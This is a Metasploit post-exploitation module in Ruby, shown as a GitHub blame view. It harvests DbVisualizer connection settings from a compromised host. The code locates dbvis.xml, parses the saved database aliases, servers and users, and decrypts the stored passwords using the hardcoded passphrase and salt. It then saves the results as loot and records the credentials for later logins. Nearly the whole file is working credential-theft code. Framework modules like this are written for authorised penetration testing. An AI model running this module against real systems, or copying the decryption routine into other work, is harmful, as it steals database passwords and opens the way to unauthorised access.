metasploit-framework/modules/post/multi/gather/dbvis_enum.rb

369 lines
9.4 KiB
Ruby
Raw Normal View History

##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/auxiliary/report'
2015-05-28 05:21:00 +00:00
require 'openssl'
require 'digest/md5'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Unix
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'Multi Gather DbVisualizer Connections Settings',
'Description' => %q{
DbVisualizer stores the user database configuration in dbvis.xml.
2015-05-28 05:21:00 +00:00
This module retrieves the connections settings from this file and decrypts the encrypted passwords.
},
'License' => MSF_LICENSE,
'Author' => [ 'David Bloom' ], # Twitter: @philophobia78
'Platform' => %w{ linux win },
'SessionTypes' => [ 'meterpreter', 'shell']
))
2015-05-28 05:58:36 +00:00
register_options(
[
OptString.new('PASSPHRASE', [false, 'The hardcoded passphrase used for encryption']),
OptInt.new('ITERATION_COUNT', [false, 'The iteration count used in key derivation', 10])
], super.class)
end
def run
2014-07-15 16:31:37 +00:00
oldversion = false
case session.platform
when 'linux'
2015-05-28 05:21:00 +00:00
user = session.shell_command('whoami').chomp
print_status("Current user is #{user}")
2015-05-28 05:21:00 +00:00
if user =~ /root/
2014-07-14 19:39:34 +00:00
user_base = "/root/"
else
2014-07-15 16:31:37 +00:00
user_base = "/home/#{user}/"
end
dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
when 'windows'
if session.type == 'meterpreter'
user_profile = session.sys.config.getenv('USERPROFILE')
else
user_profile = cmd_exec("echo %USERPROFILE%").strip
end
dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
end
2014-07-14 20:24:53 +00:00
unless file?(dbvis_file)
2014-07-15 16:31:37 +00:00
# File not found, we next try with the old config path
print_status("File not found: #{dbvis_file}")
2015-05-28 05:21:00 +00:00
print_status('This could be an older version of dbvis, trying old path')
2014-07-15 10:33:07 +00:00
case session.platform
2016-10-31 21:35:36 +00:00
when 'linux'
2014-07-15 16:31:37 +00:00
dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
2016-10-31 21:35:36 +00:00
when 'windows'
2014-07-15 16:31:37 +00:00
dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml"
end
unless file?(dbvis_file)
print_error("File not found: #{dbvis_file}")
return
end
2014-07-15 16:31:37 +00:00
oldversion = true
end
2014-07-14 19:39:34 +00:00
2014-07-15 16:31:37 +00:00
print_status("Reading: #{dbvis_file}")
print_line()
2014-07-14 20:27:40 +00:00
raw_xml = ""
begin
raw_xml = read_file(dbvis_file)
rescue EOFError
# If there's nothing in the file, we hit EOFError
print_error("Nothing read from file: #{dbvis_file}, file may be empty")
return
end
2014-07-15 16:31:37 +00:00
if oldversion
# Parse old config file
2014-12-12 12:16:21 +00:00
db_table = parse_old_config_file(raw_xml)
else
# Parse new config file
2014-12-12 12:16:21 +00:00
db_table = parse_new_config_file(raw_xml)
end
2014-07-14 20:27:40 +00:00
if db_table.rows.empty?
2015-05-28 05:21:00 +00:00
print_status('No database settings found')
else
2015-05-28 05:21:00 +00:00
print_line
print_line(db_table.to_s)
2015-05-28 05:21:00 +00:00
print_good('Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun!')
2014-07-15 13:04:46 +00:00
print_line()
2015-05-28 05:21:00 +00:00
# Store found databases in loot
p = store_loot('dbvis.databases', 'text/csv', session, db_table.to_csv, 'dbvis_databases.txt', 'dbvis databases')
print_good("Databases settings stored in: #{p.to_s}")
end
print_status("Downloading #{dbvis_file}")
p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config")
print_good "dbvis.xml saved to #{p.to_s}"
end
# New config file parse function
2014-12-12 12:16:21 +00:00
def parse_new_config_file(raw_xml)
db_table = Rex::Text::Table.new(
2015-05-28 05:21:00 +00:00
'Header' => "DbVisualizer Databases",
'Indent' => 2,
'Columns' =>
[
"Alias",
"Type",
"Server",
"Port",
"Database",
"Namespace",
2015-05-29 06:08:24 +00:00
"UserID",
2015-05-28 05:21:00 +00:00
"Password"
])
2014-07-15 16:31:37 +00:00
dbs = []
db = {}
dbfound = false
2015-05-28 05:21:00 +00:00
version_found = false
# fetch config file
2014-07-14 20:27:40 +00:00
raw_xml.each_line do |line|
2014-07-15 13:04:46 +00:00
2015-05-28 05:21:00 +00:00
if version_found == false
version_found = find_version(line)
2014-07-15 13:04:46 +00:00
end
2014-07-14 19:39:34 +00:00
if line =~ /<Database id=/
dbfound = true
elsif line =~ /<\/Database>/
2014-07-15 16:31:37 +00:00
dbfound = false
2014-07-14 19:39:34 +00:00
if db[:Database].nil?
db[:Database] = "";
end
if db[:Namespace].nil?
db[:Namespace] = "";
end
# save
2015-06-02 09:16:16 +00:00
dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port])
2014-07-14 19:39:34 +00:00
db = {}
end
if dbfound == true
2014-07-14 19:39:34 +00:00
# get the alias
2015-05-28 05:21:00 +00:00
if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i
2014-07-14 19:39:34 +00:00
db[:Alias] = $1
end
# get the type
2015-05-28 05:21:00 +00:00
if line =~ /<Type>([\S+\s+]+)<\/Type>/i
2015-06-02 09:18:36 +00:00
db[:Type] = $1
2014-07-14 19:39:34 +00:00
end
# get the user
2015-05-28 05:21:00 +00:00
if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
2015-05-29 06:08:24 +00:00
db[:UserID] = $1
2014-07-14 19:39:34 +00:00
end
2015-05-28 05:21:00 +00:00
# get user password
if line =~ /<Password>([\S+\s+]+)<\/Password>/i
enc_password = $1
db[:Password] = decrypt_password(enc_password)
end
2014-07-14 19:39:34 +00:00
# get the server
2015-05-28 05:21:00 +00:00
if line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i
2014-07-14 19:39:34 +00:00
db[:Server] = $1
end
# get the port
2015-05-28 05:21:00 +00:00
if line =~ /<UrlVariable UrlVariableName="Port">([\S+\s+]+)<\/UrlVariable>/i
2014-07-14 19:39:34 +00:00
db[:Port] = $1
end
# get the database
2015-05-28 05:21:00 +00:00
if line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i
2014-07-14 19:39:34 +00:00
db[:Database] = $1
end
# get the Namespace
2015-05-28 05:21:00 +00:00
if line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i
2014-07-14 19:39:34 +00:00
db[:Namespace] = $1
end
end
end
2014-07-14 19:39:34 +00:00
2014-07-15 16:31:37 +00:00
# Fill the tab and report eligible servers
2014-07-14 20:14:54 +00:00
dbs.each do |db|
if ::Rex::Socket.is_ipv4?(db[:Server].to_s)
2015-05-28 05:21:00 +00:00
print_good("Reporting #{db[:Server]}")
2014-07-14 20:14:54 +00:00
report_host(:host => db[:Server]);
end
2015-05-29 06:08:24 +00:00
db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:UserID], db[:Password] ]
2015-06-02 09:16:16 +00:00
report_cred(
ip: db[:Server],
port: db[:Port].to_i,
service_name: db[:Type],
username: db[:UserID],
password: db[:Password]
)
2014-07-14 20:14:54 +00:00
end
return db_table
end
2014-07-15 12:21:09 +00:00
# New config file parse function
2014-12-12 12:16:21 +00:00
def parse_old_config_file(raw_xml)
db_table = Rex::Text::Table.new(
2015-05-28 05:21:00 +00:00
'Header' => 'DbVisualizer Databases',
'Indent' => 2,
'Columns' =>
[
2015-05-28 05:21:00 +00:00
'Alias',
'Type',
'URL',
'UserID',
'Password'
])
2014-07-15 16:31:37 +00:00
dbs = []
db = {}
dbfound = false
2015-05-28 05:21:00 +00:00
version_found = false
# fetch config file
raw_xml.each_line do |line|
2014-07-15 13:04:46 +00:00
2015-05-28 05:21:00 +00:00
if version_found == false
vesrion_found = find_version(line)
2014-07-15 13:04:46 +00:00
end
if line =~ /<Database id=/
dbfound = true
elsif line =~ /<\/Database>/
2014-07-15 16:31:37 +00:00
dbfound = false
# save
dbs << db if (db[:Alias] and db[:Url] )
db = {}
end
if dbfound == true
# get the alias
2015-05-28 05:21:00 +00:00
if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i
db[:Alias] = $1
end
# get the type
2015-05-28 05:21:00 +00:00
if line =~ /<Type>([\S+\s+]+)<\/Type>/i
db[:Type] = $1
end
# get the user
2015-05-28 05:21:00 +00:00
if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
2015-05-29 06:08:24 +00:00
db[:UserID] = $1
end
2015-05-28 05:21:00 +00:00
#get the user password
if line =~ /<Password>([\S+\s+]+)<\/Password>/i
enc_password = $1
db[:Password] = decrypt_password(enc_password)
end
# get the server URL
if line =~ /<Url>(\S+)<\/Url>/i
2015-05-29 06:08:24 +00:00
db[:URL] = $1
end
2015-05-28 05:21:00 +00:00
end
2014-07-14 20:14:54 +00:00
end
# Fill the tab
dbs.each do |db|
2015-05-29 06:08:24 +00:00
if (db[:URL] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i)
2015-06-02 09:16:16 +00:00
server = $1
if ::Rex::Socket.is_ipv4?(server)
print_good("Reporting #{server}")
report_host(:host => server)
2014-07-15 16:31:37 +00:00
end
2014-07-15 12:21:09 +00:00
end
2015-05-29 06:08:24 +00:00
db_table << [ db[:Alias] , db[:Type] , db[:URL], db[:UserID], db[:Password] ]
2015-06-02 09:16:16 +00:00
report_cred(
ip: server,
port: '',
service_name: db[:Type],
username: db[:UserID],
password: db[:Password]
)
end
return db_table
2014-07-14 20:17:54 +00:00
end
2014-12-12 12:16:21 +00:00
def find_version(tag)
2014-07-15 16:31:37 +00:00
found = false
2015-05-28 05:21:00 +00:00
if tag =~ /<Version>([\S+\s+]+)<\/Version>/i
2014-07-15 16:31:37 +00:00
found = true
2015-05-28 05:21:00 +00:00
print_good("DbVisualizer version: #{$1}")
end
found
end
2015-06-02 09:16:16 +00:00
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
post_reference_name: self.refname,
session_id: session_db_id,
origin_type: :session,
private_data: opts[:password],
private_type: :password,
username: opts[:username]
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
}.merge(service_data)
create_credential_login(login_data)
end
2015-05-28 05:21:00 +00:00
def decrypt_password(enc_password)
enc_password = Rex::Text.decode_base64(enc_password)
dk, iv = get_derived_key
des = OpenSSL::Cipher.new('DES-CBC')
des.decrypt
2015-05-28 05:21:00 +00:00
des.key = dk
des.iv = iv
password = des.update(enc_password) + des.final
2015-05-28 05:21:00 +00:00
end
def get_derived_key
key = passphrase + salt
iteration_count.times do
key = Digest::MD5.digest(key)
2014-07-15 16:31:37 +00:00
end
2015-05-28 05:21:00 +00:00
return key[0,8], key[8,8]
end
def salt
[-114,18,57,-100,7,114,111,90].pack('C*')
end
def passphrase
2015-05-28 05:58:36 +00:00
datastore['PASSPHRASE'] || 'qinda'
2015-05-28 05:21:00 +00:00
end
def iteration_count
2015-05-28 05:58:36 +00:00
datastore['ITERATION_COUNT'] || 10
2014-07-15 13:04:46 +00:00
end
end